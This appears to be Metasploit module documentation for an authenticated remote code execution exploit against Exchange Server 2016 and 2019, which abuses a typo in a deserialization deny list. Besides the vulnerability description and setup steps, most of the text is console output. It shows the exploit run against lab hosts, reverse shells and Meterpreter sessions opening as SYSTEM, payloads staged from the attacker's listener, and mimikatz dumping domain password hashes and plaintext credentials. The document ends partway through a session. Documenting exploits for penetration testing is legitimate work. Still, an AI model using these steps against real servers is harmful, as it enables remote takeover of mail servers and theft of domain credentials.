## Vulnerable Application

### Description
This vulnerability allows remote attackers to execute arbitrary code
on Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11
prior to Security Update 2, Exchange Server 2016 CU21 prior to Security Update 3,
and Exchange Server 2016 CU22 prior to Security Update 2.

Note that authentication is required to exploit this vulnerability.

The specific flaw exists due to the fact that the deny list for the
ChainedSerializationBinder had a typo whereby an entry was typo'd as
`System.Security.ClaimsPrincipal` instead of the proper value of
`System.Security.Claims.ClaimsPrincipal`.

By leveraging this vulnerability, attacks can bypass the
`ChainedSerializationBinder`'s deserialization deny list
and execute code as `NT AUTHORITY\SYSTEM`.

Tested against Exchange Server 2019 CU11 SU0 on Windows Server 2019,
and Exchange Server 2016 CU22 SU0 on Windows Server 2016.

### Setup

1. Set up a version of Windows Server 2019.
2. Download Exchange Server 2019 CU11 SU0 from https://download.microsoft.com/download/5/3/e/53e75dbd-ca33-496a-bd23-1d861feaa02a/ExchangeServer2019-x64-CU11.ISO
3. Follow the guide at https://petri.com/how-to-install-active-directory-in-windows-server-2019-server-manager to turn
the server into an AD server.
4. Mount the ISO and run `Setup.exe`. It should prompt you install .NET Framework, Visual Studio C++ Redistributables,
and Unified Communications Managed API. Install these and then reboot.
5. Follow https://www.nucleustechnologies.com/blog/step-by-step-guide-to-install-exchange-server-2019-part-1/ and
install the required features.
6. Keep running `Setup.exe` and installing extra dependencies as needed as per the links.
7. When you do get all dependencies installed, Exchange should give a button called `Install` which should no longer be
greyed out. Press this to install and accept any warnings that appear.
8. Go to https://*ip here*/owa/ and make sure you can see the Exchange Outlook login page.

## Verification Steps

1. Follow [Setup](#setup) to set up a vulnerable target.
2. `msfconsole`
3. `set RHOST <target IP address>`
4. `set LHOST <IP for target to connect back to>`
5. `set HttpUsername <username of OWA user to log in as>`
6. `set HttpPassword <password for this OWA user>`
7. Optional: `set DOMAIN <domain of OWA user>`
8. Optional: `set VHOST <vhost of target>`
9. `exploit`
10. You should get a shell on the target as `NT AUTHORITY\SYSTEM` if it is vulnerable.

## Targets

### 0

Windows Command

### 1

Windows Dropper
### 2

PowerShell Stager

## Options

### HttpUsername

Set this to the OWA username. This can also be set to a valid domain username that has permissions to log into Exchange.

### HttpPassword

Set this to the OWA password. This can also be set to the password for a domain user that has permissions to log into Exchange.

## Scenarios

### Exchange Server 2016 CU22 SU0 On Windows Server 2016

#### Target 0 - Windows Command
```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce 
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOSTS 172.24.104.104
RHOSTS => 172.24.104.104
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
HttpUsername => administrator
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
HttpPassword => thePassword123!
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.24.97.166 
LHOST => 172.24.97.166
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options

Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  thePassword123!  yes       The password to use to authenticate to the Ex
                                            change server
   HttpUsername  administrator    yes       The username to log into the Exchange server
                                            as
   Proxies                        no        A proxy chain of format type:host:port[,type:
                                            host:port][...]
   RHOSTS        172.24.104.104   yes       The target host(s), see https://github.com/ra
                                            pid7/metasploit-framework/wiki/Using-Metasplo
                                            it
   RPORT         443              yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen
                                             on. This must be an address on the local mac
                                            hine or 0.0.0.0 to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSL           true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is
                                            randomly generated)
   TARGETURI     /                yes       Base path
   URIPATH                        no        The URI to use for this exploit (default is r
                                            andom)
   VHOST                          no        HTTP server virtual host


Payload options (cmd/windows/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LHOST         172.24.97.166    yes       The listen address (an interface may be speci
                                            fied)
   LOAD_MODULES                   no        A list of powershell modules separated by a c
                                            omma to download over the web
   LPORT         4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Command


msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit

[*] Started reverse TCP handler on 172.24.97.166:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is a vulnerable build.
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAABjPvjo3ZQTRrRX7vZy33WTAAAADs7u
[+] ID value for Inbox folder is AQMkADM5MTA3MzQ3LTQyZjYtNGQyMy05YTdjLWY1ZWQwNDZmZDgwNQAuAAADkwyiNLXBI0qL2/WrTMzfsQEAYz746N2UE0a0V+72ct91kwAAAgEMAAAA
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[*] Powershell session session 1 opened (172.24.97.166:4444 -> 172.24.104.104:8404 ) at 2022-02-22 17:27:02 -0600

PS C:\windows\system32\inetsrv> whoami
nt authority\system
PS C:\windows\system32\inetsrv> 
```


#### Target 1 - Windows Dropper
```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce 
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOSTS 172.24.104.104
RHOSTS => 172.24.104.104
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
HttpUsername => administrator
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
HttpPassword => thePassword123!
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.24.97.166 
LHOST => 172.24.97.166
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set target 1
target => 1
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options

Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  thePassword123!  yes       The password to use to authenticate to the Ex
                                            change server
   HttpUsername  administrator    yes       The username to log into the Exchange server
                                            as
   Proxies                        no        A proxy chain of format type:host:port[,type:
                                            host:port][...]
   RHOSTS        172.24.104.104   yes       The target host(s), see https://github.com/ra
                                            pid7/metasploit-framework/wiki/Using-Metasplo
                                            it
   RPORT         443              yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen
                                             on. This must be an address on the local mac
                                            hine or 0.0.0.0 to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSL           true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is
                                            randomly generated)
   TARGETURI     /                yes       Base path
   URIPATH                        no        The URI to use for this exploit (default is r
                                            andom)
   VHOST                          no        HTTP server virtual host


Payload options (windows/x64/meterpreter_reverse_https):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, proc
                                          ess, none)
   EXTENSIONS                   no        Comma-separate list of extensions to load
   EXTINIT                      no        Initialization strings for extensions
   LHOST       172.24.97.166    yes       The local listener hostname
   LPORT       4444             yes       The local listener port
   LURI                         no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   1   Windows Dropper


msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit

[*] Started HTTPS reverse handler on https://172.24.97.166:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is a vulnerable build.
[*] Using URL: http://0.0.0.0:8080/7nZtWqPZw3Oz
[*] Local IP: http://172.24.97.166:8080/7nZtWqPZw3Oz
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAABjPvjo3ZQTRrRX7vZy33WTAAAADs72
[+] ID value for Inbox folder is AQMkADM5MTA3MzQ3LTQyZjYtNGQyMy05YTdjLWY1ZWQwNDZmZDgwNQAuAAADkwyiNLXBI0qL2/WrTMzfsQEAYz746N2UE0a0V+72ct91kwAAAgEMAAAA
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[*] Command Stager progress - 100.00% done (151/151 bytes)
[*] Client 172.24.104.104 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.576) requested /7nZtWqPZw3Oz
[*] Sending payload to 172.24.104.104 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.576)
[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Without a database connected that payload UUID tracking will not work!
[*] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Redirecting stageless connection from /886ARUzXt2EUshWwdqdmVAWJyxlofzHG with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_0_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15'
[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Without a database connected that payload UUID tracking will not work!
[*] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Attaching orphaned/stageless session...
[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 2 opened (172.24.97.166:4444 -> 127.0.0.1 ) at 2022-02-22 17:34:07 -0600
[*] Server stopped.

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username          Domain          NTLM               SHA1               DPAPI
--------          ------          ----               ----               -----
Administrator     TESTINGDOMAIN2  373b765d01cd8aefe  220cface685ef2b97  968811261fcbaff0d
                                  a318e3843980454    a998f965b0d9b996b  2d5c4c8e546ba87
                                                     55d560
EXCHG-2016$       TESTINGDOMAIN2  f03d9a521cfd7eed6  ab32f2765ba2a3a3c
                                  51c0ce1b0298d82    914aa472be639b241
                                                     21e69c
HealthMailbox2e9  TESTINGDOMAIN2  c1ab4c2b030aa3759  363c5d7a09080cd07  4e9729bc7336ca551
0d89                              a4790cf6c78c642    d85c7ebacafd4ccb4  0624e08feaef9eb
                                                     70c944

ssp credentials
===============

Username                      Domain  Password
--------                      ------  --------
HealthMailbox2e90d89fe61a419  (null)  LWjz0zSYg$YiYf2r{e-24zpAr)4@.u)Iq)h!49{6w(i_/_-3^%{
ba6c0942480b9c30e@testingdom          K-Tpaf#d]Xefo.z}9.g6Qk(Ba@J&V)wH2h!X4a:eWO}_}ynh3n;
ain.internal                          G81r@gX$q9RGGFa7s@$B3IdYxz

wdigest credentials
===================

Username              Domain          Password
--------              ------          --------
(null)                (null)          (null)
Administrator         TESTINGDOMAIN2  (null)
EXCHG-2016$           TESTINGDOMAIN2  (null)
HealthMailbox2e90d89  TESTINGDOMAIN2  (null)

kerberos credentials
====================

Username              Domain                  Password
--------              ------                  --------
(null)                (null)                  (null)
Administrator         TESTINGDOMAIN.INTERNAL  (null)
EXCHG-2016$           testingdomain.internal  ae 82 5d 5c e8 3a aa 57 91 23 b2 83 bb 27 6
                                              1 43 ad d1 16 58 40 5f b8 0c 54 fa e8 42 6c
                                               a8 57 23 9b 75 7d 33 a4 09 16 c1 f1 34 37
                                              fc ec 10 b7 bd 41 03 45 c0 0c d4 26 91 8b e
                                              4 d5 c7 43 98 be 91 80 fa fd ff 85 98 1b 49
                                               82 c2 26 29 00 29 4e eb c2 e5 53 5f 09 f1
                                              75 4b 3e 6d f0 ce 9a 4c b4 6e 60 c0 8f 2a d
                                              e e0 31 df 2b a9 6a e7 e3 8a b7 3c 90 5a 9d
                                               bc 39 6d 52 1a 3b 99 0a 10 b9 e0 fe b4 47
                                              5e 46 af dc 32 70 43 aa dc 7f 74 67 5d 98 f
                                              9 d6 b1 31 b8 00 5b 07 19 7f 84 d5 1d 71 2c
                                               3c c6 ea 72 13 86 fe a7 8b 1b 1d 77 7c 62
                                              d7 83 e7 d1 94 02 e8 3a 0c c1 c5 9b 47 19 f
                                              b a8 21 69 47 d4 77 67 e2 30 9f 03 f8 23 3c
                                               94 c6 68 32 15 1c 8f 94 2e 44 f7 3b 9e 69
                                              ac 87 4f 5f 51 9a 21 d2 df b6 84 d6 93 21 f
                                              7 f3 0c 27 df 31 5d 33 e3 32 e9
HealthMailbox2e90d89  TESTINGDOMAIN.INTERNAL  (null)
exchg-2016$           TESTINGDOMAIN.INTERNAL  (null)


meterpreter > 
```

#### Target 2 - PowerShell Stager
```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce 
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOSTS 172.24.104.104
RHOSTS => 172.24.104.104
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
HttpUsername => administrator
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
HttpPassword => thePassword123!
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.24.97.166 
LHOST => 172.24.97.166
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set target 2
target => 2
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options

Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  thePassword123!  yes       The password to use to authenticate to the Ex
                                            change server
   HttpUsername  administrator    yes       The username to log into the Exchange server
                                            as
   Proxies                        no        A proxy chain of format type:host:port[,type:
                                            host:port][...]
   RHOSTS        172.24.104.104   yes       The target host(s), see https://github.com/ra
                                            pid7/metasploit-framework/wiki/Using-Metasplo
                                            it
   RPORT         443              yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen
                                             on. This must be an address on the local mac
                                            hine or 0.0.0.0 to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSL           true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is
                                            randomly generated)
   TARGETURI     /                yes       Base path
   URIPATH                        no        The URI to use for this exploit (default is r
                                            andom)
   VHOST                          no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, proces
                                        s, none)
   LHOST     172.24.97.166    yes       The local listener hostname
   LPORT     4444             yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   2   PowerShell Stager


msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit

[*] Started HTTPS reverse handler on https://172.24.97.166:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is a vulnerable build.
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAABjPvjo3ZQTRrRX7vZy33WTAAAADs76
[+] ID value for Inbox folder is AQMkADM5MTA3MzQ3LTQyZjYtNGQyMy05YTdjLWY1ZWQwNDZmZDgwNQAuAAADkwyiNLXBI0qL2/WrTMzfsQEAYz746N2UE0a0V+72ct91kwAAAgEMAAAA
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: jobjtqox) Without a database connected that payload UUID tracking will not work!
[*] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: jobjtqox) Staging x64 payload (201308 bytes) ...
[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: jobjtqox) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 3 opened (172.24.97.166:4444 -> 127.0.0.1 ) at 2022-02-22 17:37:56 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username          Domain          NTLM               SHA1               DPAPI
--------          ------          ----               ----               -----
Administrator     TESTINGDOMAIN2  373b765d01cd8aefe  220cface685ef2b97  968811261fcbaff0d
                                  a318e3843980454    a998f965b0d9b996b  2d5c4c8e546ba87
                                                     55d560
EXCHG-2016$       TESTINGDOMAIN2  f03d9a521cfd7eed6  ab32f2765ba2a3a3c
                                  51c0ce1b0298d82    914aa472be639b241
                                                     21e69c
HealthMailbox2e9  TESTINGDOMAIN2  c1ab4c2b030aa3759  363c5d7a09080cd07  4e9729bc7336ca551
0d89                              a4790cf6c78c642    d85c7ebacafd4ccb4  0624e08feaef9eb
                                                     70c944

ssp credentials
===============

Username                      Domain  Password
--------                      ------  --------
HealthMailbox2e90d89fe61a419  (null)  LWjz0zSYg$YiYf2r{e-24zpAr)4@.u)Iq)h!49{6w(i_/_-3^%{
ba6c0942480b9c30e@testingdom          K-Tpaf#d]Xefo.z}9.g6Qk(Ba@J&V)wH2h!X4a:eWO}_}ynh3n;
ain.internal                          G81r@gX$q9RGGFa7s@$B3IdYxz

wdigest credentials
===================

Username              Domain          Password
--------              ------          --------
(null)                (null)          (null)
Administrator         TESTINGDOMAIN2  (null)
EXCHG-2016$           TESTINGDOMAIN2  (null)
HealthMailbox2e90d89  TESTINGDOMAIN2  (null)

kerberos credentials
====================

Username              Domain                  Password
--------              ------                  --------
(null)                (null)                  (null)
Administrator         TESTINGDOMAIN.INTERNAL  (null)
EXCHG-2016$           testingdomain.internal  ae 82 5d 5c e8 3a aa 57 91 23 b2 83 bb 27 6
                                              1 43 ad d1 16 58 40 5f b8 0c 54 fa e8 42 6c
                                               a8 57 23 9b 75 7d 33 a4 09 16 c1 f1 34 37
                                              fc ec 10 b7 bd 41 03 45 c0 0c d4 26 91 8b e
                                              4 d5 c7 43 98 be 91 80 fa fd ff 85 98 1b 49
                                               82 c2 26 29 00 29 4e eb c2 e5 53 5f 09 f1
                                              75 4b 3e 6d f0 ce 9a 4c b4 6e 60 c0 8f 2a d
                                              e e0 31 df 2b a9 6a e7 e3 8a b7 3c 90 5a 9d
                                               bc 39 6d 52 1a 3b 99 0a 10 b9 e0 fe b4 47
                                              5e 46 af dc 32 70 43 aa dc 7f 74 67 5d 98 f
                                              9 d6 b1 31 b8 00 5b 07 19 7f 84 d5 1d 71 2c
                                               3c c6 ea 72 13 86 fe a7 8b 1b 1d 77 7c 62
                                              d7 83 e7 d1 94 02 e8 3a 0c c1 c5 9b 47 19 f
                                              b a8 21 69 47 d4 77 67 e2 30 9f 03 f8 23 3c
                                               94 c6 68 32 15 1c 8f 94 2e 44 f7 3b 9e 69
                                              ac 87 4f 5f 51 9a 21 d2 df b6 84 d6 93 21 f
                                              7 f3 0c 27 df 31 5d 33 e3 32 e9
HealthMailbox2e90d89  TESTINGDOMAIN.INTERNAL  (null)
exchg-2016$           TESTINGDOMAIN.INTERNAL  (null)


meterpreter > 
```

### Exchange Server 2019 CU11 SU0 on Windows Server 2019 Fully Updated with February 2022 Patches

#### Target 0 - Windows Command
```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOST 172.31.160.218
RHOST => 172.31.160.218
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.31.171.42
LHOST => 172.31.171.42
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
HttpUsername => administrator
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
HttpPassword => thePassword123!
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options

Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  thePassword123!  yes       The password to use to authenticate to the Ex
                                            change server
   HttpUsername  administrator    yes       The username to log into the Exchange server
                                            as
   Proxies                        no        A proxy chain of format type:host:port[,type:
                                            host:port][...]
   RHOSTS        172.31.160.218   yes       The target host(s), see https://github.com/ra
                                            pid7/metasploit-framework/wiki/Using-Metasplo
                                            it
   RPORT         443              yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen
                                             on. This must be an address on the local mac
                                            hine or 0.0.0.0 to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSL           true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is
                                            randomly generated)
   TARGETURI     /                yes       Base path
   URIPATH                        no        The URI to use for this exploit (default is r
                                            andom)
   VHOST                          no        HTTP server virtual host


Payload options (cmd/windows/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LHOST         172.31.171.42    yes       The listen address (an interface may be speci
                                            fied)
   LOAD_MODULES                   no        A list of powershell modules separated by a c
                                            omma to download over the web
   LPORT         4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Command


msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit

[*] Started reverse TCP handler on 172.31.171.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exchange Server 15.2.986.5 is a vulnerable build.
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAAD+NAPdfxHOQog5PRD09yZZAAADvk7f
[+] ID value for Inbox folder is AQMkADk4Nzg3MTk4LTdmMWItNDIwOC1hNjYAZC1hMDU4ZWYyMGEyNDYALgAAA63xDZKmFz1AgDziIaoT/0sBAP40A91/Ec5CiDk9EPT3JlkAAAIBDAAAAA==
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[*] Powershell session session 1 opened (172.31.171.42:4444 -> 172.31.160.218:30212 ) at 2022-02-14 18:01:56 -0600

PS C:\windows\system32\inetsrv> whoami
nt authority\system
PS C:\windows\system32\inetsrv> exit

[*] 172.31.160.218 - Powershell session session 1 closed.  Reason: User exit
```

#### Target 1 - Windows Dropper
```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOST 172.31.160.218
RHOST => 172.31.160.218
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.31.171.42
LHOST => 172.31.171.42
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
HttpUsername => administrator
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
HttpPassword => thePassword123!
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set TARGET 1
TARGET => 1
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options

Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  thePassword123!  yes       The password to use to authenticate to the Ex
                                            change server
   HttpUsername  administrator    yes       The username to log into the Exchange server
                                            as
   Proxies                        no        A proxy chain of format type:host:port[,type:
                                            host:port][...]
   RHOSTS        172.31.160.218   yes       The target host(s), see https://github.com/ra
                                            pid7/metasploit-framework/wiki/Using-Metasplo
                                            it
   RPORT         443              yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen
                                             on. This must be an address on the local mac
                                            hine or 0.0.0.0 to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSL           true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is
                                            randomly generated)
   TARGETURI     /                yes       Base path
   URIPATH                        no        The URI to use for this exploit (default is r
                                            andom)
   VHOST                          no        HTTP server virtual host


Payload options (windows/x64/meterpreter_reverse_https):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, proc
                                          ess, none)
   EXTENSIONS                   no        Comma-separate list of extensions to load
   EXTINIT                      no        Initialization strings for extensions
   LHOST       172.31.171.42    yes       The local listener hostname
   LPORT       4444             yes       The local listener port
   LURI                         no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   1   Windows Dropper


msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit

[*] Started HTTPS reverse handler on https://172.31.171.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exchange Server 15.2.986.5 is a vulnerable build.
[*] Using URL: http://0.0.0.0:8080/QULKk6
[*] Local IP: http://172.31.171.42:8080/QULKk6
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAAD+NAPdfxHOQog5PRD09yZZAAADvk7o
[+] ID value for Inbox folder is AQMkADk4Nzg3MTk4LTdmMWItNDIwOC1hNjYAZC1hMDU4ZWYyMGEyNDYALgAAA63xDZKmFz1AgDziIaoT/0sBAP40A91/Ec5CiDk9EPT3JlkAAAIBDAAAAA==
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[*] Client 172.31.160.218 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.2268) requested /QULKk6
[*] Sending payload to 172.31.160.218 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.2268)
[*] Command Stager progress - 100.00% done (145/145 bytes)
[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Without a database connected that payload UUID tracking will not work!
[*] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Redirecting stageless connection from /LLPgD_mj7kz9ZPxmn24Q9Qv80ANZ8PU38jaMQ3JCPiwWGPz3Gm6fNlGNzXZ9e_8y5xxnpC6a-JVHNcPmhyMpFnMCwvLNQeZRvnB9 with UA 'Mozilla/5.0 (iPad; CPU OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1'
[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Without a database connected that payload UUID tracking will not work!
[*] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Attaching orphaned/stageless session...
[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 2 opened (172.31.171.42:4444 -> 127.0.0.1 ) at 2022-02-14 18:02:25 -0600
[*] Server stopped.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...
